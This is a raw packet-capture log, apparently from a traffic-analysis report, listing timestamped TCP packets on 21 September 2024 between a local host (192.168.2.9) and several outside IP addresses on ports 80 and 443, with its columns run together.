                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475800991 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475805998 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475811005 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475816011 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475816965 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475822926 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475841999 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475856066 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475863934 CEST49725443192.168.2.9185.166.143.48
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475864887 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475871086 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475878000 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475888968 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475889921 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475899935 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475912094 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475915909 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475922108 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475933075 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475944042 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475948095 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475956917 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475960016 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475970030 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475975037 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475980997 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.475992918 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476001978 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476003885 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476016045 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476027966 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476030111 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476042032 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476047993 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476053953 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476066113 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476073980 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476077080 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476089954 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476100922 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476102114 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476115942 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476118088 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476125956 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476139069 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476145983 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476149082 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476160049 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476170063 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476172924 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476192951 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476207972 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476663113 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476675034 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476686954 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476699114 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476708889 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476713896 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476721048 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476723909 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476732016 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476742983 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476754904 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476758957 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476767063 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476768017 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476778030 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476800919 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476800919 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476805925 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476819038 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476829052 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476835012 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476840019 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476852894 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476854086 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476875067 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476876974 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476902008 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476902962 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476917028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476927042 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476938963 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476942062 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476950884 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476963043 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476969004 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.476994038 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477010965 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477044106 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477056026 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477066040 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477077961 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477087975 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477092028 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477101088 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477117062 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477121115 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477128983 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477140903 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477140903 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477153063 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477166891 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477174997 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477186918 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477196932 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477207899 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477210999 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477220058 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477231026 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477240086 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477247000 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477258921 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477260113 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477274895 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477283001 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477287054 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477298975 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477298975 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477310896 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477323055 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477325916 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477334976 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477346897 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477355003 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477360010 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477371931 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477374077 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477385044 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477396965 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477400064 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477408886 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477416039 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477427006 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477428913 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477441072 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477447987 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477453947 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477467060 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477483988 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477507114 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477850914 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477864027 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477874994 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477886915 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477897882 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477897882 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477927923 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477933884 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477947950 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477958918 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477969885 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477974892 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477982998 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.477994919 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478007078 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478025913 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478045940 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478066921 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478080034 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478090048 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478137016 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478214025 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478225946 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478236914 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478240967 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478249073 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478255987 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478260994 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478270054 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478276014 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478287935 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478298903 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478300095 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478319883 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478323936 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478336096 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478346109 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478347063 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478360891 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478372097 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478373051 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478388071 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478389978 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478399992 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478410959 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478415966 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478424072 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478435040 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478446007 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478449106 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478450060 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478457928 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478462934 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478477955 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478487015 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478492975 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478499889 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478503942 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478517056 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478526115 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478528023 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478539944 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478549004 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478550911 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478550911 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478564024 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478564978 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478579044 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478590965 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478594065 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478601933 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478611946 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478616953 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478627920 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478634119 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478638887 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478650093 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478660107 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478663921 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478677034 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478678942 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478688002 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478697062 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478719950 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.478745937 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479079962 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479090929 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479100943 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479121923 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479123116 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479134083 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479139090 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479146004 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479157925 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479166031 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479170084 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479182005 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479193926 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479195118 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479218006 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479238987 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479273081 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479285002 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479296923 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479312897 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479372978 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479418039 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479429960 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479440928 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479451895 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479454041 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479461908 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479474068 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479480028 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479485035 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479496002 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479506969 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479515076 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479517937 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479528904 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479537964 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479541063 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479548931 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479552031 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479568005 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.479574919 CEST8049713176.113.115.33192.168.2.9
